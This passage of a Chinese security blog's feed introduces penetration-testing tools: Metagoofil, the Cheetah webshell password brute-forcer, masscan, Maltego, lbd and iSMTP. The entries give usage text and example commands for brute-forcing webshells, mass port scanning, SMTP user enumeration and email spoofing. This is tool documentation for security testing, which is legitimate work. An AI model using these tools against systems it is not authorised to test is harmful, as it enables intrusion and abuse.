___   ___  / _(_) | *</div><div class="line">*    /    \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *</div><div class="line">*   / /\/\ \  __/ || (_| | (_| | (_) | (_) |  _| | | *</div><div class="line">*   \/    \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *</div><div class="line">*                         |___/                      *</div><div class="line">* Metagoofil Ver 2.2                                 *</div><div class="line">* Christian Martorella                               *</div><div class="line">* Edge-Security.com                                  *</div><div class="line">* cmartorella_at_edge-security.com                   *</div><div class="line">******************************************************</div><div class="line">[&apos;pdf&apos;]</div><div class="line"></div><div class="line">[-] Starting online search...</div><div class="line"></div><div class="line">[-] Searching for pdf files, with a limit of 100</div><div class="line">        Searching 100 results...</div><div class="line">Results: 21 files found</div><div class="line">Starting to download 25 of them:</div></pre></td></tr></table></figure><p></p>]]></content>
    
    <summary type="html">
    
      #0X00-介绍0X00 介绍
Metagoofil是一种搜索提取目标公司公开文档（pdf，doc，xls，ppt，docx，pptx，xlsx）中元数据的信息收集工具。

Metagoofil将在Google中进行搜索，以将文档识别并下载到本地磁盘，然后将使用不同的库（如Hachoir，PdfMiner）提取元数据，通过分析得到结果生成具有用户名，软件版本和服务器或机器名称的报告，有助于渗透测试人员信息收集阶段的工作。

“MetaGooFil”也是信息收集过程中可以利用的优秀软件，由开发The
Harvester的团队编写而成，可用来提取元数据（metadata）。元数据经常被定义为是关于数据的数据。在我们创建文档时，例如Word或PowerPoint演示文稿，额外的数据也会被同时创建，并储存在文档里。这些数据通常是对该文档的描述信息，包括文件名、文件大小、作者或创建者的用户名，以及文件保存的位置或路径。这个过程全自动进行，无需用户输入或干预。

攻击者若能读取到这些信息，就能对目标公司的用户名、系统名、文件共享以及其他诸多好东西有独特的见解。MetaGooFil就是这么一个工具，能在互联网上搜索属于目标的文档。一旦有所发现，MetaGooFil就会把这些文档下载下来，并尝试提取有用的元数据。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="information gathering" scheme="https://hackfun.org/tags/information-gathering/"/>
    
      <category term="enumeration" scheme="https://hackfun.org/tags/enumeration/"/>
    
      <category term="recon" scheme="https://hackfun.org/tags/recon/"/>
    
      <category term="reporting" scheme="https://hackfun.org/tags/reporting/"/>
    
      <category term="metagoofil" scheme="https://hackfun.org/tags/metagoofil/"/>
    
  </entry>
  
  <entry>
    <title>Webshell密码极速爆破工具-cheetah</title>
    <link href="https://hackfun.org/2017/04/24/Webshell%E5%AF%86%E7%A0%81%E6%9E%81%E9%80%9F%E7%88%86%E7%A0%B4%E5%B7%A5%E5%85%B7-cheetah/"/>
    <id>https://hackfun.org/2017/04/24/Webshell密码极速爆破工具-cheetah/</id>
    <published>2017-04-24T04:32:00.000Z</published>
    <updated>2017-10-02T19:31:43.911Z</updated>
    
    <content type="html"><![CDATA[<h1 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h1><p>Cheetah是一款基于字典的webshell密码爆破工具，Cheetah的工作原理是能根据自动探测出的web服务设置相关参数一次性提交大量的探测密码进行爆破，爆破效率是其他普通webshell密码暴力破解工具上千倍。</p><p>项目地址：<a href="https://github.com/sunnyelf/cheetah" target="_blank" rel="external">https://github.com/sunnyelf/cheetah</a></p><a id="more"></a><h1 id="0x01-特点"><a href="#0x01-特点" class="headerlink" title="0x01 特点"></a>0x01 特点</h1><ul><li>速度极快</li><li>支持批量爆破</li><li>自动伪造请求</li><li>自动探测web服务设置相关参数</li><li>支持读取和去重超大密码字典文件</li><li>支持python 2.x和3.x</li><li>目前支持php、jsp、asp、aspx webshell</li></ul><h1 id="0x02-参数说明"><a href="#0x02-参数说明" class="headerlink" title="0x02 参数说明"></a>0x02 参数说明</h1><pre><code>_________________________________________________       ______              _____         ________________  /_ _____ _____ __  /_______ ____  /__  ___/__  __ \_  _ \_  _ \_  __/_  __ \ __  __ \/ /__  _  / / //  __//  __// /_  / /_/ / _  / / /\___/  / / /_/ \___/ \___/ \__/  \____/  / / /_/      /_/                               /_/a very fast brute force webshell password tool.usage: cheetah.py [-h] [-i] [-v] [-c] [-up] [-r] [-w] [-s] [-n] [-u] [-b]                   [-p [file [file ...]]]可选参数:  -h, --help            显示帮助信息并退出  -i, --info            显示程序信息并退出  -v, --verbose         启用详细输出模式(默认禁用)  -c, --clear           去重字典文件(默认禁用)  -up, --update         更新cheetah  -r , --request        指定请求方式(默认POST方式)  -t , --time           指定请求间隔时间(默认0秒)  -w , --webshell       指定webshell类型(默认自动探测)  -s , --server         指定web服务器名称(默认自动探测)  -n , --number         指定一次请求参数数量(默认自动设置)  -u , --url            指定webshell url地址  -b , --url-file       指定批量webshell urls文件  -p   file [file ...]  指定多个字典文件(默认使用data/pwd.list)使用示例:  python cheetah.py -u http://orz/orz.php  python cheetah.py -u http://orz/orz.jsp -r post -n 1000 -v  python cheetah.py -u http://orz/orz.asp -r get -c -p pwd.list  python cheetah.py -u http://orz/orz -w aspx -s apache -n 1000  python cheetah.py -b url.list -c -p pwd1.list pwd2.list -v</code></pre><h1 id="0x03-下载使用"><a href="#0x03-下载使用" class="headerlink" title="0x03 下载使用"></a>0x03 下载使用</h1><pre><code>git clone https://github.com/sunnyelf/cheetah.gitpython cheetah.py </code></pre><h1 id="0x04-文件说明"><a href="#0x04-文件说明" class="headerlink" title="0x04 文件说明"></a>0x04 文件说明</h1><pre><code>cheetah:│  .codeclimate.yml│  .gitignore│  .travis.yml│  cheetah.py             主程序│  LICENSE│  README.md│  README_zh.md│  update.py              更新模块│├─data│      big_shell_pwd.7z   高效shell大字典│      pwd.list           默认指定字典文件│      url.list           默认指定批量webshell url文件│      user-agent.list    用户代理文件│└─images        1.png        2.png        3.png        4.png        logo.jpg</code></pre><h1 id="0x05-截图"><a href="#0x05-截图" class="headerlink" title="0x05 截图"></a>0x05 截图</h1><h2 id="Ubuntu"><a href="#Ubuntu" class="headerlink" title="Ubuntu"></a>Ubuntu</h2><p><img src="https://github.com/sunnyelf/cheetah/raw/master/images/4.png" alt="cheetah"></p><h2 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h2><p><img src="https://github.com/sunnyelf/cheetah/raw/master/images/1.png" alt="cheetah"><br><img src="https://github.com/sunnyelf/cheetah/raw/master/images/2.png" alt="cheetah"><br><img src="https://github.com/sunnyelf/cheetah/raw/master/images/3.png" alt="cheetah"></p><h1 id="0x06-问题"><a href="#0x06-问题" class="headerlink" title="0x06 问题"></a>0x06 问题</h1><p>如果在使用过程中出现了bug欢迎提交<a href="https://github.com/sunnyelf/cheetah/issues" target="_blank" rel="external">issues</a>，我会及时回复并修复。</p><h1 id="0x07-参考"><a href="#0x07-参考" class="headerlink" title="0x07 参考"></a>0x07 参考</h1><p><a href="https://www.t00ls.net/articles-36985.html" target="_blank" rel="external">让你的一句话爆破速度提升千倍</a></p><p><a href="http://journal.ucas.ac.cn/CN/abstract/abstract12402.shtml" target="_blank" rel="external">一种有效的Web指纹识别方法</a></p><p><a href="https://kennel209.gitbooks.io/owasp-testing-guide-v4/content/zh/web_application_security_testing/fingerprint_web_server_otg-info-002.html" target="_blank" rel="external">识别Web服务器 (OTG-INFO-002)</a></p><p><a href="https://github.com/Shuang0420/Shuang0420.github.io/wiki/python%E8%AF%BBGB%E7%BA%A7%E5%A4%A7%E6%96%87%E4%BB%B6" target="_blank" rel="external">python读GB级大文件</a></p>]]></content>
    
    <summary type="html">
    
      #0X00-介绍0X00 介绍
Cheetah是一款基于字典的webshell密码爆破工具，Cheetah的工作原理是能根据自动探测出的web服务设置相关参数一次性提交大量的探测密码进行爆破，爆破效率是其他普通webshell密码暴力破解工具上千倍。

项目地址：https://github.com/sunnyelf/cheetah [https://github.com/sunnyelf/cheetah]
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="cheetah" scheme="https://hackfun.org/tags/cheetah/"/>
    
      <category term="password attack" scheme="https://hackfun.org/tags/password-attack/"/>
    
      <category term="webshell密码爆破" scheme="https://hackfun.org/tags/webshell%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4/"/>
    
      <category term="webshell" scheme="https://hackfun.org/tags/webshell/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux信息收集之masscan</title>
    <link href="https://hackfun.org/2017/04/23/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8Bmasscan/"/>
    <id>https://hackfun.org/2017/04/23/Kali-Linux信息收集之masscan/</id>
    <published>2017-04-23T03:03:41.000Z</published>
    <updated>2017-10-02T19:22:31.877Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h2><p>视频介绍：<a href="https://asciinema.org/a/31820" target="_blank" rel="external">https://asciinema.org/a/31820</a><br>masscan目前是最快的互联网端口扫描器，最快可以在六分钟内扫遍互联网。<br>masscan的扫描结果类似于nmap(一个很著名的端口扫描器)，在内部，它更像scanrand, unicornscan, and ZMap，采用了异步传输的方式。它和这些扫描器最主要的区别是，它比这些扫描器更快。而且，masscan更加灵活，它允许自定义任意的地址范和端口范围。<br><a id="more"></a></p><p><a href="https://github.com/robertdavidgraham/masscan" target="_blank" rel="external">主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/masscan.git;a=summary" target="_blank" rel="external">仓库</a></p><ul><li>作者：Robert Graham</li><li>证书：GPLv2</li></ul><h2 id="0x01-功能"><a href="#0x01-功能" class="headerlink" title="0x01 功能"></a>0x01 功能</h2><p>masscan - 异步TCP端口扫描器<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">root@kali:~# masscan</div><div class="line">用法:</div><div class="line">masscan -p80,8000-8100 10.0.0.0/8 --rate=10000</div><div class="line"> 扫描一些Web端口10.x.x.x以每秒10000发包速率</div><div class="line">masscan --nmap</div><div class="line"> 列出与nmap兼容的选项</div><div class="line">masscan -p80 10.0.0.0/8 --banners -oB &lt;filename&gt;</div><div class="line"> 将二进制格式的扫描结果保存到&lt;filename&gt;</div><div class="line">masscan --open --banners --readscan &lt;filename&gt; -oX &lt;savefile&gt;</div><div class="line"> 读取二进制扫描结果&lt;filename&gt;，并将其保存为xml格式&lt;savefile&gt;</div></pre></td></tr></table></figure><p></p><h2 id="0x02-更多参数"><a href="#0x02-更多参数" class="headerlink" title="0x02 更多参数"></a>0x02 更多参数</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div></pre></td><td class="code"><pre><div class="line">&lt;ip/range&gt; IP地址范围，有三种有效格式：</div><div class="line">1、单独的IPv4地址 </div><div class="line">2、类似&quot;10.0.0.1-10.0.0.233&quot;的范围地址 </div><div class="line">3、CIDR地址 类似于&quot;0.0.0.0/0&quot;，多个目标可以用都好隔开</div><div class="line"></div><div class="line">-p &lt;ports,--ports &lt;ports&gt;&gt;         指定端口进行扫描</div><div class="line"></div><div class="line">--banners                          获取banner信息，支持少量的协议</div><div class="line"></div><div class="line">--rate &lt;packets-per-second&gt;        指定发包的速率</div><div class="line"></div><div class="line">-c &lt;filename&gt;, --conf &lt;filename&gt;   读取配置文件进行扫描</div><div class="line"></div><div class="line">--echo                             将当前的配置重定向到一个配置文件中</div><div class="line"></div><div class="line">-e &lt;ifname&gt; , --adapter &lt;ifname&gt;   指定用来发包的网卡接口名称</div><div class="line"></div><div class="line">--adapter-ip &lt;ip-address&gt;          指定发包的IP地址</div><div class="line"></div><div class="line">--adapter-port &lt;port&gt;              指定发包的源端口</div><div class="line"></div><div class="line">--adapter-mac &lt;mac-address&gt;        指定发包的源MAC地址</div><div class="line"></div><div class="line">--router-mac &lt;mac address&gt;         指定网关的MAC地址</div><div class="line"></div><div class="line">--exclude &lt;ip/range&gt;               IP地址范围黑名单，防止masscan扫描</div><div class="line"></div><div class="line">--excludefile &lt;filename&gt;           指定IP地址范围黑名单文件</div><div class="line"></div><div class="line">--includefile，-iL &lt;filename&gt;      读取一个范围列表进行扫描</div><div class="line"></div><div class="line">--ping                             扫描应该包含ICMP回应请求</div><div class="line"></div><div class="line">--append-output                    以附加的形式输出到文件</div><div class="line"></div><div class="line">--iflist                           列出可用的网络接口，然后退出</div><div class="line"></div><div class="line">--retries                          发送重试的次数，以1秒为间隔</div><div class="line"></div><div class="line">--nmap                             打印与nmap兼容的相关信息</div><div class="line"></div><div class="line">--http-user-agent &lt;user-agent&gt;     设置user-agent字段的值</div><div class="line"></div><div class="line">--show [open,close]                告诉要显示的端口状态，默认是显示开放端口</div><div class="line"></div><div class="line">--noshow [open,close]              禁用端口状态显示</div><div class="line"></div><div class="line">--pcap &lt;filename&gt;                  将接收到的数据包以libpcap格式存储</div><div class="line"></div><div class="line">--regress                          运行回归测试，测试扫描器是否正常运行</div><div class="line"></div><div class="line">--ttl &lt;num&gt;                        指定传出数据包的TTL值，默认为255</div><div class="line"></div><div class="line">--wait &lt;seconds&gt;                   指定发送完包之后的等待时间，默认为10秒</div><div class="line"></div><div class="line">--offline                          没有实际的发包，主要用来测试开销</div><div class="line"></div><div class="line">-sL                                不执行扫描，主要是生成一个随机地址列表</div><div class="line"></div><div class="line">--readscan &lt;binary-files&gt;          读取从-oB生成的二进制文件，可以转化为XML或者JSON格式.</div><div class="line"></div><div class="line">--connection-timeout &lt;secs&gt;        抓取banners时指定保持TCP连接的最大秒数，默认是30秒。</div></pre></td></tr></table></figure><h2 id="0x03-教程"><a href="#0x03-教程" class="headerlink" title="0x03 教程"></a>0x03 教程</h2><p><a href="http://www.freebuf.com/sectool/112583.html" target="_blank" rel="external">Masscan：最快的互联网IP端口扫描器</a><br><a href="http://blog.csdn.net/isinstance/article/details/50466194" target="_blank" rel="external">Kali下masscan的使用</a><br><a href="http://www.91ri.org/10800.html" target="_blank" rel="external">基于无状态的极速扫描技术</a></p>]]></content>
    
    <summary type="html">
    
      #0X00-介绍0X00 介绍
视频介绍：https://asciinema.org/a/31820 [https://asciinema.org/a/31820]
masscan目前是最快的互联网端口扫描器，最快可以在六分钟内扫遍互联网。
masscan的扫描结果类似于nmap(一个很著名的端口扫描器)，在内部，它更像scanrand, unicornscan, and
ZMap，采用了异步传输的方式。它和这些扫描器最主要的区别是，它比这些扫描器更快。而且，masscan更加灵活，它允许自定义任意的地址范和端口范围。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="information gathering" scheme="https://hackfun.org/tags/information-gathering/"/>
    
      <category term="信息收集" scheme="https://hackfun.org/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"/>
    
      <category term="recon" scheme="https://hackfun.org/tags/recon/"/>
    
      <category term="portscanning" scheme="https://hackfun.org/tags/portscanning/"/>
    
      <category term="masscan" scheme="https://hackfun.org/tags/masscan/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux信息收集之Maltego</title>
    <link href="https://hackfun.org/2017/04/23/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8BMaltego/"/>
    <id>https://hackfun.org/2017/04/23/Kali-Linux信息收集之Maltego/</id>
    <published>2017-04-23T02:00:00.000Z</published>
    <updated>2017-10-02T19:22:31.910Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h2><p>Maltego是一个独特的平台，旨在为组织拥有和运营的环境提供清晰的威胁构图。Maltego的独特优势是展示单一故障点的复杂性和严重性以及当前基础架构范围内的信任关系。</p><p>Maltego向网络和资源为基础的实体提供的独特视角是在互联网上发布的信息的聚合 - 无论是当前配置的路由器在网络边缘的位置，还是当下某副总裁在国际上的下落，Maltego可以寻找、聚合和可视化这些信息。</p><a id="more"></a><p>Maltego为用户提供前所未有的信息。信息是杠杆；信息是力量；信息就是Maltego。</p><p>Maltego可以做什么？</p><p>Maltego是可用于确定之间的关系和真实世界之间的联系的程序：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line">- 人</div><div class="line">- 一群人（社交网络）</div><div class="line">- 公司</div><div class="line">- 组织机构</div><div class="line">- 网站</div><div class="line">- 互联网基础设施</div><div class="line">- 域名</div><div class="line">- DNS名称</div><div class="line">- Netblocks</div><div class="line">- IP地址</div><div class="line">- 短语</div><div class="line">- 附属机构</div><div class="line">- 文档和文件</div><div class="line">- 这些实体使用开源智能进行链接。</div><div class="line">- Maltego易于安装 - 它使用Java，因此它可以在Windows，Mac和Linux上运行。</div><div class="line">- Maltego 为您提供了一个图形界面，可让您快速，准确地查看这些关系，从而可以看到隐藏的连接。</div><div class="line">- 使用图形用户界面（GUI），您可以轻松地看到关系 - 即使离开三到四度。</div><div class="line">- Maltego是独一无二的，因为它使用了一个功能强大，灵活的框架，使自定义成为可能。因此，Maltego可以适应您自己的独特要求。</div></pre></td></tr></table></figure><p></p><p>Maltego可以为我做什么？<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">- Maltego可用于所有安全相关工作的信息收集阶段。它将节省您的时间，并将使您更准确，更智能地工作。</div><div class="line">- Maltego通过视觉展示搜索项目之间的互连链接，帮助您进行思索过程。</div><div class="line">- Maltego为您提供了更强大的搜索功能，为您带来更智能的搜索结果。</div><div class="line">- Maltego可以帮助您发现“隐藏”信息</div></pre></td></tr></table></figure><p></p><!--more--><p><a href="http://paterva.com/" target="_blank" rel="external">主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/maltego-teeth.git;a=summary" target="_blank" rel="external">仓库</a></p><ul><li>作者：Paterva</li><li>证书：Commercial</li></ul><h2 id="0x02-教程"><a href="#0x02-教程" class="headerlink" title="0x02 教程"></a>0x02 教程</h2><p><a href="http://pan.baidu.com/s/15GxR4" target="_blank" rel="external">Maltego信息收集基础教程</a><br><a href="http://www.freebuf.com/articles/system/58096.html" target="_blank" rel="external">使用Kali Linux在渗透测试中信息收集</a><br><a href="http://wifibeta.com/2012-03/thread-675-1-1.html" target="_blank" rel="external">Maltego——互联网情报聚合工具初探</a><br><a href="https://wizardforcel.gitbooks.io/daxueba-kali-linux-tutorial/content/24.html" target="_blank" rel="external">使用Maltego收集信息</a><br><a href="http://www.freebuf.com/sectool/104949.html" target="_blank" rel="external">使用Maltego进行互联网情报收集（入门篇）</a></p>]]></content>
    
    <summary type="html">
    
      #0X00-介绍0X00 介绍
Maltego是一个独特的平台，旨在为组织拥有和运营的环境提供清晰的威胁构图。Maltego的独特优势是展示单一故障点的复杂性和严重性以及当前基础架构范围内的信任关系。

Maltego向网络和资源为基础的实体提供的独特视角是在互联网上发布的信息的聚合 -
无论是当前配置的路由器在网络边缘的位置，还是当下某副总裁在国际上的下落，Maltego可以寻找、聚合和可视化这些信息。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="information gathering" scheme="https://hackfun.org/tags/information-gathering/"/>
    
      <category term="信息收集" scheme="https://hackfun.org/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"/>
    
      <category term="portscanning" scheme="https://hackfun.org/tags/portscanning/"/>
    
      <category term="exploitation" scheme="https://hackfun.org/tags/exploitation/"/>
    
      <category term="webapps" scheme="https://hackfun.org/tags/webapps/"/>
    
      <category term="gui" scheme="https://hackfun.org/tags/gui/"/>
    
      <category term="maltego teeth" scheme="https://hackfun.org/tags/maltego-teeth/"/>
    
      <category term="maltego" scheme="https://hackfun.org/tags/maltego/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux信息收集之lbd</title>
    <link href="https://hackfun.org/2017/04/23/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8Blbd/"/>
    <id>https://hackfun.org/2017/04/23/Kali-Linux信息收集之lbd/</id>
    <published>2017-04-23T01:46:00.000Z</published>
    <updated>2017-10-02T19:22:31.906Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h2><p>视频介绍：<a href="https://asciinema.org/a/32257" target="_blank" rel="external">https://asciinema.org/a/32257</a><br>lbd(load balancing detector,负载平衡检测器)检测给定的域是否使用DNS/HTTP负载平衡（通过Server和DateHTTP响应头字段和服务器应答之间的差异）。</p><a id="more"></a><p><a href="http://ge.mine.nu/code/lbd" target="_blank" rel="external">主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/lbd.git;a=summary" target="_blank" rel="external">仓库</a></p><ul><li>作者：Stefan Behte</li><li>证书：GPLv2</li></ul><p>0x01 功能</p><hr><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">root@kali:~# lbd</div><div class="line"></div><div class="line">lbd - load balancing detector 0.4 - Checks if a given domain uses load-balancing.</div><div class="line">                                    Written by Stefan Behte (http://ge.mine.nu)</div><div class="line">                                    Proof-of-concept! Might give false positives.</div><div class="line">用法: /usr/bin/lbd [域名]</div></pre></td></tr></table></figure><h2 id="0x02-示例"><a href="#0x02-示例" class="headerlink" title="0x02 示例"></a>0x02 示例</h2><p>测试目标域（example.com）是否使用负载平衡：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">root@kali:~# lbd example.com</div><div class="line"></div><div class="line">lbd - load balancing detector 0.4 - Checks if a given domain uses load-balancing.</div><div class="line">                                    Written by Stefan Behte (http://ge.mine.nu)</div><div class="line">                                    Proof-of-concept! Might give false positives.</div><div class="line"></div><div class="line">Checking for DNS-Loadbalancing: NOT FOUND</div><div class="line">Checking for HTTP-Loadbalancing [Server]:</div><div class="line">ECS (sea/55ED)</div><div class="line">ECS (sea/1C15)</div><div class="line">FOUND</div></pre></td></tr></table></figure><p></p>]]></content>
    
    <summary type="html">
    
      #0X00-介绍0X00 介绍
视频介绍：https://asciinema.org/a/32257 [https://asciinema.org/a/32257]
lbd(load balancing
detector,负载平衡检测器)检测给定的域是否使用DNS/HTTP负载平衡（通过Server和DateHTTP响应头字段和服务器应答之间的差异）。
    
    </summary>
    
      <category term="神兵利器" scheme="https://hackfun.org/categories/%E7%A5%9E%E5%85%B5%E5%88%A9%E5%99%A8/"/>
    
    
      <category term="kali linux" scheme="https://hackfun.org/tags/kali-linux/"/>
    
      <category term="information gathering" scheme="https://hackfun.org/tags/information-gathering/"/>
    
      <category term="recon" scheme="https://hackfun.org/tags/recon/"/>
    
      <category term="webapps" scheme="https://hackfun.org/tags/webapps/"/>
    
      <category term="lbd" scheme="https://hackfun.org/tags/lbd/"/>
    
  </entry>
  
  <entry>
    <title>Kali Linux信息收集之iSMTP</title>
    <link href="https://hackfun.org/2017/04/23/Kali-Linux%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E4%B9%8BiSMTP/"/>
    <id>https://hackfun.org/2017/04/23/Kali-Linux信息收集之iSMTP/</id>
    <published>2017-04-23T01:13:00.000Z</published>
    <updated>2017-10-02T19:22:31.942Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0x00-介绍"><a href="#0x00-介绍" class="headerlink" title="0x00 介绍"></a>0x00 介绍</h2><p>测试SMTP用户枚举（RCPT TO和VRFY），内部欺骗和转发。</p><a id="more"></a><p><a href="https://github.com/altjx/ipwn/" target="_blank" rel="external">主页</a> | <a href="http://git.kali.org/gitweb/?p=packages/ismtp.git;a=summary" target="_blank" rel="external">仓库</a></p><ul><li>作者：Alton Johnson</li><li>证书：GPLv2</li></ul><p>0x01 功能</p><h2 id="ismtp-SMTP用户枚举和测试工具"><a href="#ismtp-SMTP用户枚举和测试工具" class="headerlink" title="ismtp - SMTP用户枚举和测试工具"></a>ismtp - SMTP用户枚举和测试工具</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div></pre></td><td class="code"><pre><div class="line">root@kali:~# ismtp</div><div class="line"></div><div class="line"> ---------------------------------------------------------------------</div><div class="line">  iSMTP v1.6 - SMTP Server Tester, Alton Johnson (alton.jx@gmail.com)</div><div class="line"> ---------------------------------------------------------------------</div><div class="line"></div><div class="line"> 用法: ./iSMTP.py &lt;选项&gt;</div><div class="line"></div><div class="line"> 必需:</div><div class="line"></div><div class="line">    -f &lt;import file&gt;    导入用于测试的SMTP服务器列表(不能同时使用&apos;-h&apos;)</div><div class="line">    -h &lt;host&gt;           目标IP和端口(格式 IP:port)(不能同时使用&apos;-f&apos;)</div><div class="line"></div><div class="line"> 欺骗:</div><div class="line"></div><div class="line">    -i &lt;isa email&gt;      互联网安全加速(Internet Security and Acceleration,ISA)电子邮件地址。</div><div class="line">    -s &lt;sndr email&gt;     发件人电子邮件地址。</div><div class="line">    -r &lt;rcpt email&gt;     收件人电子邮件地址。</div><div class="line">       --sr &lt;email&gt;     指定发件人和收件人电子邮件地址。</div><div class="line">    -S &lt;sndr name&gt;      发件人姓名。</div><div class="line">    -R &lt;rcpt name&gt;      收件人姓名。</div><div class="line">       --SR &lt;name&gt;      指定发件人和收件人姓名。</div><div class="line">    -m                  启用S​​MTP欺骗测试。</div><div class="line">    -a                  附带欺骗邮件的.txt附件。</div><div class="line"></div><div class="line"> SMTP枚举:</div><div class="line"></div><div class="line">    -e &lt;file&gt;           启用S​​MTP用户枚举测试并导入电子邮件列表。</div><div class="line">    -l &lt;1|2|3&gt;          指定枚举类型(1 = VRFY, 2 = RCPT TO, 3 = all).(默认第3种)</div><div class="line"></div><div class="line"> SMTP转发:</div><div class="line"></div><div class="line">    -i &lt;isa email&gt;      互联网安全加速(Internet Security and Acceleration,ISA)电子邮件地址。</div><div class="line">    -x                  启用S​​MTP外部转发测试。</div><div class="line"></div><div class="line"> 其他:</div><div class="line"></div><div class="line">    -t &lt;secs&gt;           超时值(Default is 10.)</div><div class="line">    -o                  创建“ismtp-results”目录并将输出写入到ismtp-results/smtp_&lt;service&gt;_&lt;ip&gt;(port).txt</div><div class="line"></div><div class="line">注意：支持任何选项的组合（例如枚举，转发，两者组合，所有组合等）。</div></pre></td></tr></table></figure><h2 id="0x02-示例"><a href="#0x02-示例" class="headerlink" title="0x02 示例"></a>0x02 示例</h2><p>Test a list of IPs from a file (-f smtp-ips.txt) enumerating usernames from a dictionary file (-e /usr/share/wordlists/metasploit/unix_users.txt):<br>从一个IP列表文件（-f smtp-ips.txt）中枚举来自字典文件（-e /usr/share/wordlists/metasploit/unix_users.txt）的用户：<br></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div 